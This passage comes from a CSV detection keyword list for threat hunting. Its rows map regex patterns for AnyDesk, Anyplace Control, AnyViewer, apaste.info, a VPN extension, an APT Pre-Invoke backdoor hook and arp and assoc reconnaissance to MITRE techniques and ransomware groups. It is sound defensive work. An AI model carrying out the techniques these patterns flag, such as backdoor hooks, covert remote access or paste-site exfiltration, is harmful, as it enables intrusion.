Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk.lnk*",".{0,1000}\\AnyDesk\.lnk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk\ad.trace*",".{0,1000}\\AnyDesk\\ad\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk\ad_svc.trace*",".{0,1000}\\AnyDesk\\ad_svc\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk\connection_trace.txt*",".{0,1000}\\AnyDesk\\connection_trace\.txt.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - 
Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk\connection_trace.txt*",".{0,1000}\\AnyDesk\\connection_trace\.txt.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\anydesk\printer_driver*",".{0,1000}\\anydesk\\printer_driver.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk\service.conf*",".{0,1000}\\AnyDesk\\service\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDeskPrintDriver.cat*",".{0,1000}\\AnyDeskPrintDriver\.cat.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - 
LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\anydeskprintdriver.inf*",".{0,1000}\\anydeskprintdriver\.inf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\anydeskprintdriver.inf*",".{0,1000}\\anydeskprintdriver\.inf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\AnyDesk\system.conf*",".{0,1000}\\AppData\\Roaming\\AnyDesk\\system\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\AnyDesk\user.conf*",".{0,1000}\\AppData\\Roaming\\AnyDesk\\user\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - 
TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\ControlSet001\Services\AnyDesk*",".{0,1000}\\ControlSet001\\Services\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\Pictures\AnyDesk*",".{0,1000}\\Pictures\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\Prefetch\ANYDESK.EXE*",".{0,1000}\\Prefetch\\ANYDESK\.EXE.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" 
"*\ProgramFile*\previous-version",".{0,1000}\\ProgramFile.{0,40}\\previous-version","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","old anydesk version after update","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Clients\Media\AnyDesk*",".{0,1000}\\SOFTWARE\\Clients\\Media\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\Temp\AnyDeskUninst*",".{0,1000}\\Temp\\AnyDeskUninst.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\Videos\AnyDesk*",".{0,1000}\\Videos\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance 
detection","10","10","N/A","N/A","N/A","N/A" "*0DBF152DEAF0B981A8A938D53F769DB8*",".{0,1000}0DBF152DEAF0B981A8A938D53F769DB8.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A" "*9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE*",".{0,1000}9CD1DDB78ED05282353B20CDFE8FA0A4FB6C1ECE.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A" "*9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF*",".{0,1000}9D7620A4CEBA92370E8828B3CB1007AEFF63AB36A2CBE5F044FDDE14ABAB1EBF.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage - compromised certificate - https://anydesk.com/en/changelog/windows","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#certificate","compromised certificate","8","8","N/A","N/A","N/A","N/A" "*AnyDesk Software GmbH*",".{0,1000}AnyDesk\sSoftware\sGmbH.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - 
TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*anydesk.exe --set-password*",".{0,1000}anydesk\.exe\s\-\-set\-password.{0,1000}","greyware_tool_keyword","anydesk","setting the AnyDesk service password manually","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*boot.net.anydesk.com*",".{0,1000}boot\.net\.anydesk\.com.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*C:\Program Files (x86)\AnyDesk*",".{0,1000}C\:\\Program\sFiles\s\(x86\)\\AnyDesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*Desktop\AnyDesk.lnk*",".{0,1000}Desktop\\AnyDesk\.lnk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM 
usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*HKCR\.anydesk\*",".{0,1000}HKCR\\\.anydesk\\.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*relay-*.net.anydesk.com*",".{0,1000}relay\-.{0,1000}\.net\.anydesk\.com.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*https://anymailfinder.com/search/*",".{0,1000}https\:\/\/anymailfinder\.com\/search\/.{0,1000}","greyware_tool_keyword","anymailfinder","used by attackers to find information about a company's users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://anymailfinder.com","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/anyplace-control/data2/*.exe*",".{0,1000}\/anyplace\-control\/data2\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Anyplace Control - Admin.lnk*",".{0,1000}\\Anyplace\sControl\s\-\sAdmin\.lnk.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Anyplace Control\*",".{0,1000}\\Anyplace\sControl\\.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\anyplace-control.ini*",".{0,1000}\\anyplace\-control\.ini.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\zmstage.exe*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\zmstage\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Anyplace Control*",".{0,1000}\\AppData\\Roaming\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Anyplace Control*",".{0,1000}\\Program\sFiles\s\(x86\)\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\Anyplace Control *",".{0,1000}\\ProgramData\\Anyplace\sControl\s.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Anyplace Control Software<*",".{0,1000}\>Anyplace\sControl\sSoftware\<.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*a2fa034d006bdbc3ee2a15e55eb647f8097355c288a858da1e309fe8ac1cf0a3*",".{0,1000}a2fa034d006bdbc3ee2a15e55eb647f8097355c288a858da1e309fe8ac1cf0a3.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*AnyplaceControlInstall.exe*",".{0,1000}AnyplaceControlInstall\.exe.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\Anyplace Control*",".{0,1000}Program\sFiles\s\(x86\)\\Anyplace\sControl.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*www.anyplace-control.com/install*",".{0,1000}www\.anyplace\-control\.com\/install.{0,1000}","greyware_tool_keyword","AnyplaceControl","access your unattended PC from anywhere","T1021 - T1071 
- T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyplace-control[.]com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/AnyViewerSetup.exe*",".{0,1000}\/AnyViewerSetup\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AnyViewerSetup.exe*",".{0,1000}\\AnyViewerSetup\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AnyViewerSetup.tmp*",".{0,1000}\\AnyViewerSetup\.tmp.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\logs\RCService.txt*",".{0,1000}\\logs\\RCService\.txt.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AnyViewer Setup<*",".{0,1000}\>AnyViewer\sSetup\<.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AnyViewer<*",".{0,1000}\>AnyViewer\<.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*0de968ffd4a6c60413cac739dccb1b162f8f93f3db754728fde8738e52706fa4*",".{0,1000}0de968ffd4a6c60413cac739dccb1b162f8f93f3db754728fde8738e52706fa4.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*334ec9e7d937c42e8ef12f9d4ec90862ecc5410c06442393a38390b34886aa59*",".{0,1000}334ec9e7d937c42e8ef12f9d4ec90862ecc5410c06442393a38390b34886aa59.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*a.aomeisoftware.com*",".{0,1000}a\.aomeisoftware\.com.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AnyViewer\audio_sniffer.dll*",".{0,1000}AnyViewer\\audio_sniffer\.dll.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AnyViewer\AVCore.exe*",".{0,1000}AnyViewer\\AVCore\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AnyViewer\RCService.exe*",".{0,1000}AnyViewer\\RCService\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*AnyViewer\ScreanCap.exe*",".{0,1000}AnyViewer\\ScreanCap\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AnyViewer\SplashWin.exe*",".{0,1000}AnyViewer\\SplashWin\.exe.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*controlserver.anyviewer.com*",".{0,1000}controlserver\.anyviewer\.com.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://ip138.com/iplookup.asp?ip=*&action=2*",".{0,1000}https\:\/\/ip138\.com\/iplookup\.asp\?ip\=.{0,1000}\&action\=2.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\AnyViewer*",".{0,1000}Program\sFiles\s\(x86\)\\AnyViewer.{0,1000}","greyware_tool_keyword","anyviewer","access your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","www.anyviewer.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://apaste.info/p/new*",".{0,1000}https\:\/\/apaste\.info\/p\/new.{0,1000}","greyware_tool_keyword","apaste.info","Creating a paste on apaste.info/","T1213 - T1190","TA0001 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://apaste.info/","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*jbnmpdkcfkochpanomnkhnafobppmccn*",".{0,1000}jbnmpdkcfkochpanomnkhnafobppmccn.{0,1000}","greyware_tool_keyword","apkfold free 
vpn","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*APT::Update::Pre-Invoke *}*",".{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}\}.{0,1000}","greyware_tool_keyword","APT","linux commands abused by attackers - backdoor apt execute a command when invoking apt","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*""C:\Windows\system32\ARP.EXE"" /a*",".{0,1000}\""C\:\\Windows\\system32\\ARP\.EXE\""\s\/a.{0,1000}","greyware_tool_keyword","arp","Arp displays and modifies information about a system's Address Resolution Protocol (ARP) cache","T1018","T1016","N/A","Turla - APT32 - Orangeworm","Discovery","N/A","1","0","N/A","N/A","5","7","N/A","N/A","N/A","N/A" "*assoc *findstr *=cm*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}\=cm.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string =cm - hidden objective is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - TA0002","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*assoc *findstr *lCmd*",".{0,1000}assoc\s.{0,1000}findstr\s.{0,1000}lCmd.{0,1000}","greyware_tool_keyword","assoc","will return the file association for file extensions that include the string lCmd - hidden objective is to find .cdxml association","T1033 - T1059 - T1083","TA0007 - 
